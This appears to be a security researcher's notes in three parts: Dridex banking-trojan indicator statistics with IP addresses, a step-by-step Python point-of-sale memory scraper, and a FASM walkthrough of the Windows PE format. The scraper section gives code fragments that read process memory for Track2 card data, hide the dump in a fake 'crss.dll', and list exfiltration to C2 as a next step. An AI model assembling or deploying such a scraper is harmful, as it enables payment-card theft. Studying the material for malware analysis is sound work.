Dridex Banker Statistics 2016-2017


Source: OSINT

Goal: Obtain statistics related to Dridex trends in 2016, including, but not limited to,

  • (1) a count of all known Dridex nodes 
  • (2) top 10 country infrastructure locations; and
  • (3) timeline histogram of node Dridex detections

Tool: Elasticsearch, Kibana, and Logstash (ELK)

Date Range: 2016-2017

Statistics:
(1) Dridex Count: 329
(2) Top 10 Country Infrastructure Location

geoip.country_name.keyword: Descending   Count
United States 77
Germany 34
United Kingdom 28
France 17
Canada 10
Netherlands 9
Australia 8
Russia 8
Thailand 8
Bulgaria 7

(3) Timeline Histogram


Detection Time IOC geoip.country_name
December 26th 2016; 20:07:34 92.222.129.145 France
December 26th 2016; 20:07:34 91.103.2.132 Ireland
December 23rd 2016; 12:35:14 82.196.5.27 Netherlands
December 22nd 2016; 07:27:36 192.188.58.163 Ecuador
December 22nd 2016; 07:27:36 203.153.165.21 Thailand
December 22nd 2016; 07:27:36 109.74.9.119 Sweden
December 22nd 2016; 07:27:36 69.43.168.214 United States
December 17th 2016; 11:27:38 71.6.155.196 United States
December 17th 2016; 11:27:38 188.68.50.34 Germany
December 15th 2016; 08:55:30 212.200.111.170 Serbia
December 12th 2016; 08:21:30 192.241.236.239 United States
December 9th 2016; 05:23:36 188.120.249.30 Russia
November 21st 2016; 06:34:36 72.249.144.95 United States
November 18th 2016; 13:35:55 188.126.72.179 Sweden
November 18th 2016; 05:55:13 174.37.216.226 United States
November 18th 2016; 05:55:13 166.78.144.68 United States
November 16th 2016; 13:54:38 54.235.86.173 United States
November 15th 2016; 09:53:22 193.136.97.4 Portugal
November 15th 2016; 09:53:22 93.122.165.54 Romania
November 11th 2016; 09:09:04 87.254.45.29 Norway
November 11th 2016; 09:09:04 149.210.158.54 Netherlands
November 5th 2016; 17:01:33 216.127.161.5 United States
November 4th 2016; 04:51:51 77.111.90.85 Hungary

Point-of-Sale Malware Instrumentation Analysis: Memory Scraper in Python

Title: Memory Scanning a Windows Process in Python Using winappdbg
Purpose: Analyze Python memory scanning point-of-sale (PoS) malware for credit card data

Analysis Steps:
(1) Display the Windows version and the current architecture

from winappdbg import *
System.os, System.arch, System.bits

(2) Create a snapshot of running processes

System.request_debug_privileges(), System.scan_processes()

(3) Obtain local username (from getpass.getuser())
(4) Create a writeable file in %APPDATA%

System.request_debug_privileges(), System.scan_processes()
dump_writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\crss.dll', 'w+')

(5) Obtain all processes that match the requested filenames:

(6) Get a memory map of the process

memoryMap  = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)

(7) For each memory block in the map read address and size of memory blocks, its state (free or allocated), page protection bits (looking for win32.MEM_COMMIT), and its memory type:
(8) Read the data from memory 

if mbi.has_content() and mbi.State == win32.MEM_COMMIT

(9) Implement a simple Regular Expression looking for Track2 data

dump_regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', data)
dump_data.append(dump_regex)

(10) Beautify the extracted data
(11) Write dump data into crss.dll
(12) Write the data to registry

import _winreg
hKey = CreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Internet Explorer\\")subKey = SetValueEx( hKey, "Test", 0, REG_BINARY, "666" )


Missing features are as follows:
(1) Encode Saved Data
(2) Add Luhn Algorithm
(3) Create a multithreaded process for this algorithm
(4) Send data to email/C2

FASM: Portable Executable Review

Source: Izcellion
Goal: Advance and review FASM programming.

I. FASM compiled source code:
  1. format PE GUI 4.0
  2. entry start
  3.  
  4. include ‘%fasminc%\win32a.inc’
  5.  
  6. section ‘.data’ data readable writeable
  7.        msgText       db     ‘Message Text’,0
  8.        msgCaption    db     ‘Message Caption’,0
  9.  
  10. section ‘.code’ code readable executable
  11.        start:
  12.               invoke MessageBox,HWND_DESKTOP,msgText,msgCaption,MB_OK + MB_ICONINFORMATION
  13.               invoke ExitProcess,0
  14.  
  15. section ‘.idata’ import data readable
  16.        library       KERNEL32,     ‘KERNEL32.DLL’,\
  17.                      USER32,       ‘USER32.DLL’
  18.      
  19.        import KERNEL32,\
  20.               ExitProcess,         ‘ExitProcess’
  21.      
  22.        import USER32,\
  23.               MessageBox,          ‘MessageBoxA’

II. Same code complied from hex into ASM readable.

db 4Dh, 5Ah, 80h, 00h, 01h, 00h, 00h, 00h, 04h, 00h, 10h, 00h, 0FFh, 0FFh, 00h, 00h
    db 40h, 01h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 80h, 00h, 00h, 00h
    db 0Eh, 1Fh, 0BAh, 0Eh, 00h, 0B4h, 09h, 0CDh, 21h, 0B8h, 01h, 4Ch, 0CDh, 21h, 54h, 68h
    db 69h, 73h, 20h, 70h, 72h, 6Fh, 67h, 72h, 61h, 6Dh, 20h, 63h, 61h, 6Eh, 6Eh, 6Fh
    db 74h, 20h, 62h, 65h, 20h, 72h, 75h, 6Eh, 20h, 69h, 6Eh, 20h, 44h, 4Fh, 53h, 20h
    db 6Dh, 6Fh, 64h, 65h, 2Eh, 0Dh, 0Ah, 24h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 50h, 45h, 00h, 00h, 4Ch, 01h, 03h, 00h, 3Fh, 65h, 0ECh, 58h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 0E0h, 00h, 0Fh, 01h, 0Bh, 01h, 01h, 47h, 00h, 02h, 00h, 00h
    db 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 20h, 00h, 00h, 00h, 20h, 00h, 00h
    db 00h, 10h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 10h, 00h, 00h, 00h, 02h, 00h, 00h
    db 01h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 40h, 00h, 00h, 00h, 02h, 00h, 00h, 2Ch, 67h, 00h, 00h, 02h, 00h, 00h, 00h
    db 00h, 10h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 00h, 01h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 30h, 00h, 00h, 96h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 2Eh, 64h, 61h, 74h, 61h, 00h, 00h, 00h
    db 1Dh, 00h, 00h, 00h, 00h, 10h, 00h, 00h, 00h, 02h, 00h, 00h, 00h, 02h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 0C0h
    db 2Eh, 63h, 6Fh, 64h, 65h, 00h, 00h, 00h, 1Ch, 00h, 00h, 00h, 00h, 20h, 00h, 00h
    db 00h, 02h, 00h, 00h, 00h, 04h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 20h, 00h, 00h, 60h, 2Eh, 69h, 64h, 61h, 74h, 61h, 00h, 00h
    db 96h, 00h, 00h, 00h, 00h, 30h, 00h, 00h, 00h, 02h, 00h, 00h, 00h, 06h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 40h, 00h, 00h, 40h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 4Dh, 65h, 73h, 73h, 61h, 67h, 65h, 20h, 54h, 65h, 78h, 74h, 00h, 4Dh, 65h, 73h
    db 73h, 61h, 67h, 65h, 20h, 43h, 61h, 70h, 74h, 69h, 6Fh, 6Eh, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 6Ah, 40h, 68h, 0Dh, 10h, 40h, 00h, 68h, 00h, 10h, 40h, 00h, 6Ah, 00h, 0FFh, 15h
    db 80h, 30h, 40h, 00h, 6Ah, 00h, 0FFh, 15h, 60h, 30h, 40h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 58h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 3Ch, 30h, 00h, 00h
    db 60h, 30h, 00h, 00h, 78h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 4Ah, 30h, 00h, 00h, 80h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 4Bh, 45h, 52h, 4Eh
    db 45h, 4Ch, 33h, 32h, 2Eh, 44h, 4Ch, 4Ch, 00h, 00h, 55h, 53h, 45h, 52h, 33h, 32h
    db 2Eh, 44h, 4Ch, 4Ch, 00h, 00h, 00h, 00h, 68h, 30h, 00h, 00h, 00h, 00h, 00h, 00h
    db 68h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 45h, 78h, 69h, 74h, 50h, 72h
    db 6Fh, 63h, 65h, 73h, 73h, 00h, 00h, 00h, 88h, 30h, 00h, 00h, 00h, 00h, 00h, 00h
    db 88h, 30h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 4Dh, 65h, 73h, 73h, 61h, 67h
    db 65h, 42h, 6Fh, 78h, 41h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
    db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h

III. Portable executable header

  1. IMAGE_DOS_HEADER:                         ;start : 00 (0) to 3F (63)
  2.        .e_magic      dw     0x5A4D        ;00 01
  3.        .e_cblp       dw     0x0080        ;02 03
  4.        .e_cp         dw     0x0001        ;04 05
  5.        .e_crlc       dw     0x0000        ;06 07
  6.        .e_cparhdr    dw     0x0004        ;08 09
  7.        .e_minalloc   dw     0x0010        ;10 11
  8.        .e_maxalloc   dw     0xFFFF        ;12 13
  9.        .e_ss         dw     0x0000        ;14 15
  10.        .e_sp         dw     0x0140        ;16 17
  11.        .e_csum       dw     0x0000        ;18 19
  12.        .e_ip         dw     0x0000        ;20 21
  13.        .e_cs         dw     0x0000        ;22 23
  14.        .e_lfarlc     dw     0x0040        ;24 25
  15.        .e_ovno       dw     0x0000        ;26 27
  16.        .e_res        rw     4             ;28 29 | 30 31 | 32 33 | 34 35
  17.        .e_oemid      dw     0x0000        ;36 37
  18.        .e_oeminfo    dw     0x0000        ;38 39
  19.        .e_res2       rw     10            ;40 41 | 42 43 | 44 45 | 46 47 | 48 49 | 50 51
  20.        .e_lfanew     dd     0x00000080    ;52 53 | 54 55 | 56 57 | 58 59
  21.                                           ;60 61 62 63
    1. typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
    2.     WORD   e_magic;                     // Magic number
    3.     WORD   e_cblp;                      // Bytes on last page of file
    4.     WORD   e_cp;                        // Pages in file
    5.     WORD   e_crlc;                      // Relocations
    6.     WORD   e_cparhdr;                   // Size of header in paragraphs
    7.     WORD   e_minalloc;                  // Minimum extra paragraphs needed
    8.     WORD   e_maxalloc;                  // Maximum extra paragraphs needed
    9.     WORD   e_ss;                        // Initial (relative) SS value
    10.     WORD   e_sp;                        // Initial SP value
    11.     WORD   e_csum;                      // Checksum
    12.     WORD   e_ip;                        // Initial IP value
    13.     WORD   e_cs;                        // Initial (relative) CS value
    14.     WORD   e_lfarlc;                    // File address of relocation table
    15.     WORD   e_ovno;                      // Overlay number
    16.     WORD   e_res[4];                    // Reserved words
    17.     WORD   e_oemid;                     // OEM identifier (for e_oeminfo)
    18.     WORD   e_oeminfo;                   // OEM information; e_oemid specific
    19.     WORD   e_res2[10];                  // Reserved words
    20.     LONG   e_lfanew;                    // File address of new exe header
    21. } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
  1. IMAGE_NT_HEADERS:                                ;start : 80 (128) to 1EF (495)
  2.        .Signature           db     ‘PE’,0,0      ;128 131
  3.  
  4.  
  5.        IMAGE_FILE_HEADER:                        ;start : 84 (132) to 97 (151)
  6.               .Machine                           dw     0x014C        ;132 133 for intel 386
  7.               .NumberOfSection                   dw     0x0003        ;134 135
  8.               .TimeDateStamp                     dd     %t            ;136 139
  9.               .PointerToSymbolTable              dd     0             ;140 143
  10.               .NumberOfSymbols                   dd     0             ;144 147
  11.               .SizeOfOptionalHeader              dw     0x00E0        ;148 149
  12.               .Characteristic                    dw     0x818F        ;150 151

============= Portable Executable Format Walkthrough =============

; References:
; 2. LUEVELSMEYER’s description about PE file format
; 3. Microsoft PSDK July 2000 Edition
; 4. Iczelion’s PE Tutorial
IMAGE_DOS_HEADER:                               ;start : 00 (0) to 3F (63)
        .e_magic        dw      0x5A4D          ;00 01
        .e_cblp         dw      0x0080          ;02 03
        .e_cp           dw      0x0001          ;04 05
        .e_crlc         dw      0x0000          ;06 07
        .e_cparhdr      dw      0x0004          ;08 09
        .e_minalloc     dw      0x0010          ;10 11
        .e_maxalloc     dw      0xFFFF          ;12 13
        .e_ss           dw      0x0000          ;14 15
        .e_sp           dw      0x0140          ;16 17
        .e_csum         dw      0x0000          ;18 19
        .e_ip           dw      0x0000          ;20 21
        .e_cs           dw      0x0000          ;22 23
        .e_lfarlc       dw      0x0040          ;24 25
        .e_ovno         dw      0x0000          ;26 27
        .e_res          rw      4               ;28 29 | 30 31 | 32 33 | 34 35
        .e_oemid        dw      0x0000          ;36 37
        .e_oeminfo      dw      0x0000          ;38 39
        .e_res2         rw      10              ;40 41 | 42 43 | 44 45 | 46 47 | 48 49 | 50 51
        .e_lfanew       dd      0x00000080      ;52 53 | 54 55 | 56 57 | 58 59
                                                ;60 61 62 63
;=====================================================================================================
DOS_STUB:                               ;start : 40 (64) to 7F (127)
        use16                           ;DOS-STUB is a 16-bit program
                                        ;push   cs <- we save 1 byte here
                                        ;pop    ds <- we save another 1 byte here
                                        ;our DS is less 100h from CS, DS received PSP address
        mov     dx,0x100 + 0x0B         ;our db message starts at 0x0B because we save 3 bytes already
        mov     ah,0x9
        int     0x21
        mov     ah,0x4C                 ;save 1 byte here because we need to use AH only for function
        int     0x21
        
        db      ‘This program cannot be run in DOS mode.’,13,10,’$’
        rb      0x80 – $                ;0x80 – 0x75 = rb 0xB
;=====================================================================================================
IMAGE_NT_HEADERS:                                       ;start : 80 (128) to 1EF (495)
        .Signature                              db      ‘PE’,0,0                ;128 131
        
        IMAGE_FILE_HEADER:                              ;start : 84 (132) to 97 (151)
                .Machine                        dw      0x014C                  ;132 133 for intel 386
                .NumberOfSection                dw      0x0003                  ;134 135
                .TimeDateStamp                  dd      %t                      ;136 139
                .PointerToSymbolTable           dd      0                       ;140 143
                .NumberOfSymbols                dd      0                       ;144 147
                .SizeOfOptionalHeader           dw      0x00E0                  ;148 149
                .Characteristic                 dw      0x818F                  ;150 151
        
        IMAGE_OPTIONAL_HEADER:                  ;start  : 98 (152) to F7 (247) * till IMAGE_DATA_DIRECTORY
                                                                                ;offset
                .Magic                                  dw      0x010B          ;152 153
                .MajorLinkerVersion                     db      0x01            ;154
                .MinorLinkerVersion                     db      0x37            ;155
                .SizeOfCode                             dd      0               ;156 159
                .SizeOfInitializedData                  dd      0               ;160 163
                .SizeOfUninitializedData                dd      0               ;164 167
                .AddressOfEntryPoint                    dd      0x2000          ;168 171 = base + 2000 = 402000 (.code section)
                .BaseOfCode                             dd      0               ;172 175
                .BaseOfData                             dd      0               ;176 179
                .ImageBase                              dd      0x00400000      ;180 183 (default)
                .SectionAlignment                       dd      0x00001000      ;184 187 4096 bytes
                .FileAlignment                          dd      0x00000200      ;188 191 512 bytes (default)
                .MajorOperatingSystemVersion            dw      1               ;192 193
                .MinorOperatingSystemVersion            dw      0               ;194 195
                .MajorImageVersion                      dw      0               ;196 197
                .MinorImageVersion                      dw      0               ;198 199
                .MajorSubsystemVersion                  dw      4               ;200 201
                .MinorSubsystemVersion                  dw      0               ;202 203
                .Win32VersionValue                      dd      0               ;204 207
                .SizeOfImage                            dd      0x00004000      ;208 211
                .SizeOfHeaders                          dd      0x00000200      ;212 215
                .CheckSum                               dd      0x0000EF20      ;216 219
                .Subsystem                              dw      2               ;220 221 IMAGE_SUBSYSTEM_WINDOWS_GUI
                .DllCharacteristics                     dw      0               ;222 223
                .SizeOfStackReserve                     dd      0x00001000      ;224 227 4096 bytes
                .SizeOfStackCommit                      dd      0x00001000      ;228 231 4096 bytes
                .SizeOfHeapReserve                      dd      0x00100000      ;232 235 1048576 bytes
                .SizeOfHeapCommit                       dd      0               ;236 239
                .LoaderFlags                            dd      0               ;240 243
                .NumberOfRvaAndSizes                    dd      0x10            ;244 247 16 decimal
                
                IMAGE_DATA_DIRECTORY:           ;start : F8 (248) to 177 (375) * till IMAGE_SECTION_TABLE
                                                        rq      1                ;248 255
                        .ImportTableVA                  dd      0x00003000       ;256 263
                        .ImportTableSize                dd      0x00000090
                                                        rq      14               ;we don’t need them also        ;263 + 112 = 375
                IMAGE_SECTION_TABLE:            ;start : 178 (376) to 1EF (495)
                        SECTION_1:
                                .Name                   dq      ‘.data’ ;start : 178 (376)
                                .VirtualSize            dd      0x0000001D
                                .VirtualAddress         dd      0x00001000      ;-> in memory, it is 401000
                                .SizeOfRawData          dd      0x00000200 
                                .PointerToRawData       dd      0x00000200      ;-> in our file, it is 0x200 (512) (offset from zero)
                                .PointerToRelocations   dd      0
                                .PointerToLineNumbers   dd      0
                                .NumberOfRelocations    dw      0
                                .NumberOfLineNumbers    dw      0
                                .Characteristic         dd      0xC0000040      ;end   : 19F (415)
                        SECTION_2:
                                .Name                   dq      ‘.code’ ;start : 1A0 (416)
                                .VirtualSize            dd      0x0000001C
                                .VirtualAddress         dd      0x00002000      ;-> in memory, it is 402000
                                .SizeOfRawData          dd      0x00000200
                                .PointerToRawData       dd      0x00000400      ;-> in our file, it is 0x400 (1024) (offset from zero)
                                .PointerToRelocations   dd      0
                                .PointerToLineNumbers   dd      0
                                .NumberOfRelocations    dw      0
                                .NumberOfLineNumbers    dw      0
